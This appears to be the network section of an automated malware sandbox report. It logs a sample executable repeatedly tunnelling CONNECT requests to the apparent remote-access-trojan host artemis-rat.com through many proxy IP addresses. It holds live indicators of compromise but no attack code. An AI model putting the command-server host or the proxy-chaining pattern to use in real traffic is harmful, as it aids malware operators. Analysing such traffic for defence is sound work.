                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083408117 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.682040930 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902421951 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108223915 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.395950079 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.608269930 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.922334909 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1885192.168.2.55516245.120.178.19710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.645205021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1886192.168.2.55138881.17.94.50343003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.645689964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.702027082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.780502081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1887192.168.2.55455195.66.138.2188803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.650310040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1888192.168.2.555163103.156.232.8556783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.679281950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1889192.168.2.55147414.143.145.35803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.757256031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.811239004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.236718893 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1890192.168.2.55516645.11.95.16550493876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.761899948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1891192.168.2.553580128.199.196.31388323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.768131018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.811305046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.905221939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1892192.168.2.55362441.254.53.7019813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.768131971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.811367035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.066178083 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1893192.168.2.555170194.247.173.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.768392086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1894192.168.2.55517243.133.74.172156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.784603119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1895192.168.2.555171212.31.100.13841533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.826857090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1896192.168.2.5551748.219.228.100156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.827816963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1897192.168.2.55517345.11.95.16550283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.828234911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1898192.168.2.553870125.227.225.15733893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.828239918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1899192.168.2.553760192.252.208.70142823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.828489065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1900192.168.2.554702188.166.170.3280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.828797102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.159920931 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.972206116 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:16.868242979 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:18.628177881 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:22.148991108 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:29.316380024 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:43.396538973 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:12.836508036 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1901192.168.2.555175123.116.119.175813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.836891890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1902192.168.2.555201104.25.231.184803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.844285011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.998533010 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1903192.168.2.555194162.253.68.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.845602036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1904192.168.2.55518346.35.9.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.862692118 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1905192.168.2.55517779.110.202.13180813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.862847090 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1906192.168.2.554698190.120.250.739993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.862976074 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.905141115 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.999330997 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.092802048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1907192.168.2.55517631.170.22.12710803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.863184929 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1908192.168.2.554216112.30.155.83127923876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.863645077 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.821588993 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:30:50.115578890 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1909192.168.2.554593102.132.48.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.871108055 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1910192.168.2.555191194.4.50.127123343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.876390934 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1911192.168.2.55518145.11.95.16550473876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.897392035 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1912192.168.2.5551848.217.143.187156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.897478104 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1913192.168.2.55518093.90.212.241533876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.924705029 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1914192.168.2.555212172.67.209.12803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.926901102 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.102104902 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:47 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1915192.168.2.551693177.153.33.94803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.931694031 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.092444897 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.202137947 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
